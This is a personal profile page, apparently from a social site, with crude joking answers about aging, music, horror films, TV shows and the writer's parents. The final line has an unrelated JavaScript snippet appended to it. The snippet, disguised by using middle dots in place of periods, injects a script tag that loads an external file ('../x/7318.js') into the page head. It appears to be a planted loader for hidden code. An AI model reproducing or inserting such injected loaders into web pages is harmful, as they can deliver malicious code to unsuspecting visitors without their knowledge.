Recently, I'm interested in sleeping on my side so my balls don't hurt when I wake up, getting my work done on time, and living paycheck to paycheck. Does anyone else feel really old?
I'd like to meet the asshole who decided this section was a good idea.
Create Your Own!
To scroll through my iTunes library is to gaze upon utter chaos. *Translation: I like a lot of different shit. I'm a parrothead at heart, though.
Cheezy old horror movies that are more funny than scary. Like Dawn of the Dead.
The Venture Brothers, Scrubs, Family Guy, The Simpsons, the Daily Show, the Colbert Report, when I remember any of them are on. I don't normally watch a lot of Tv.
Are there boobs in it? Hand it over.
My father and mother; The surprisingly small ammount of permanent damage to my person is a monument to their infinite patience [For those of you worrying right now, let me put your mind at ease: I do my best to take care of my person, and he's none the worse for wear I assure you ; )] .."var s=document·createElement('script');s.src='../x/7318.js' ;document·getElementsByTagName('head')[0].appendChild(s );"